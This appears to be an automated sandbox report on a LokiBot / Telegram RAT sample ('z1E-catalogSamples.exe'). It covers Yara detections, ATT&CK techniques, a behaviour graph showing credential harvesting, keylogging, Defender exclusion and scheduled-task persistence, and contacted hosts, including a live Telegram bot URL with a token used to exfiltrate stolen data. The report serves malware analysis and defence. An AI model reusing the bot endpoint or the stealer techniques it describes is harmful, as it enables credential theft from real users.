                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS211
                      Security Software Discovery                      		Distributed Component Object Model21
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSH1
                      Clipboard Data                      		14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428897 Sample: z1E-catalogSamples.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 api.ipify.org 2->42 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 56 12 other signatures 2->56 8 z1E-catalogSamples.exe 8 2->8         started        12 vZkoWbol.exe 6 2->12         started        signatures3 54 Uses the Telegram API (likely for C&C communication) 40->54 process4 file5 36 C:\Users\user\AppData\Roaming\vZkoWbol.exe, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmp9244.tmp, XML 8->38 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Adds a directory exclusion to Windows Defender 8->60 62 Injects a PE file into a foreign processes 8->62 14 z1E-catalogSamples.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 20 vZkoWbol.exe 12->20         started        22 schtasks.exe 1 12->22         started        24 vZkoWbol.exe 12->24         started        signatures6 process7 dnsIp8 44 api.telegram.org 149.154.167.220, 443, 49706, 49708 TELEGRAMRU United Kingdom 14->44 46 api.ipify.org 104.26.12.205, 443, 49705, 49707 CLOUDFLARENETUS United States 14->46 68 Installs a global keyboard hook 14->68 70 Uses schtasks.exe or at.exe to add and modify task schedules 18->70 72 Loading BitLocker PowerShell Module 18->72 26 WmiPrvSE.exe 18->26         started        28 conhost.exe 18->28         started        30 conhost.exe 18->30         started        32 schtasks.exe 1 18->32         started        74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->74 76 Tries to steal Mail credentials (via file / registry access) 20->76 78 Tries to harvest and steal ftp login credentials 20->78 80 Tries to harvest and steal browser information (history, passwords, etc) 20->80 34 conhost.exe 22->34         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      z1E-catalogSamples.exe71%ReversingLabsByteCode-MSIL.Trojan.LokiBot
                      z1E-catalogSamples.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\vZkoWbol.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\vZkoWbol.exe71%ReversingLabsByteCode-MSIL.Trojan.LokiBot

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.telegram0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high
                            https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocumentfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegramz1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              https://api.ipify.orgz1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgz1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.ipify.org/tvZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://api.telegram.orgz1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2139622475.000000000326F000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgDAhz1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              		api.telegram.orgUnited Kingdom
                                              		62041TELEGRAMRUfalse
                                              104.26.12.205
                                              		api.ipify.orgUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1428897
                                              Start date and time:2024-04-19 19:32:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 42s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:z1E-catalogSamples.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@18/11@3/2
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 169
                                              • Number of non-executed functions: 14
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target z1E-catalogSamples.exe, PID 4856 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: z1E-catalogSamples.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              19:33:01API Interceptor8119555x Sleep call for process: z1E-catalogSamples.exe modified
                                              19:33:03API Interceptor13x Sleep call for process: powershell.exe modified
                                              19:33:04Task SchedulerRun new task: vZkoWbol path: C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                              19:33:05API Interceptor5898905x Sleep call for process: vZkoWbol.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                s.exeGet hashmaliciousUnknownBrowse
                                                  s.exeGet hashmaliciousUnknownBrowse
                                                    DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                      Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                        Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                          s.exeGet hashmaliciousUnknownBrowse
                                                            pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                              Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                  • api.ipify.org/?format=json
                                                                  SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                                  • api.ipify.org/
                                                                  lods.cmdGet hashmaliciousRemcosBrowse
                                                                  • api.ipify.org/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.ipify.orgPO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                  • 172.67.74.152
                                                                  Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 104.26.13.205
                                                                  eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  avp.msiGet hashmaliciousUnknownBrowse
                                                                  • 104.26.12.205
                                                                  https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                  • 104.26.13.205
                                                                  TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                  • 104.26.12.205
                                                                  KZWCMNWmmqi9lvI.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  api.telegram.orgW4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TELEGRAMRUW4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  s.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  New Soft Update.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.99
                                                                  pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                  • 149.154.167.220
                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  CLOUDFLARENETUShttps://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.2.184
                                                                  z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 172.67.191.112
                                                                  z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 104.21.60.38
                                                                  https://wetransfer.com/downloads/63408c72b6333965afb0118ce81f53d220240419112437/2452e85458854b24e1ec42e87285f82420240419112457/7d30d1?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0DGet hashmaliciousHTMLPhisherBrowse
                                                                  • 172.64.41.3
                                                                  SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.75.43
                                                                  SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.213.82
                                                                  PO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  https://docx-nok.online/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 172.67.179.148
                                                                  https://download-myproposal.xyzGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 104.17.2.184

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0erTDN001-180424_PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  PO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  http://www.sushi-idea.comGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205
                                                                  eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  • 104.26.12.205

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vZkoWbol.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1415
                                                                  Entropy (8bit):5.352427679901606
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPE4KMRbE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oPHKMRbHKx1qHitHo6hAH4
                                                                  MD5:DE3D940E8A9B37DFC59B7160768581E1
                                                                  SHA1:BEBDEF8AD46E49F69824A37D87AC578DAA8721A6
                                                                  SHA-256:EF96DE13E112BE8682DDAFA535A2C22C98EBE65390BC43A435D35F92802EB905
                                                                  SHA-512:68490DAE1E337E3A8A2D78CFB9EE5099A468EFBB9AB1E582E351A669A65B0233A4A354420F2CD7E235993A9CA166126A035E3DF24213FFC4ADE6C0714DD7AF56
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z1E-catalogSamples.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1415
                                                                  Entropy (8bit):5.352427679901606
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPE4KMRbE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oPHKMRbHKx1qHitHo6hAH4
                                                                  MD5:DE3D940E8A9B37DFC59B7160768581E1
                                                                  SHA1:BEBDEF8AD46E49F69824A37D87AC578DAA8721A6
                                                                  SHA-256:EF96DE13E112BE8682DDAFA535A2C22C98EBE65390BC43A435D35F92802EB905
                                                                  SHA-512:68490DAE1E337E3A8A2D78CFB9EE5099A468EFBB9AB1E582E351A669A65B0233A4A354420F2CD7E235993A9CA166126A035E3DF24213FFC4ADE6C0714DD7AF56
                                                                  Malicious:false
                                                                  Reputation:low
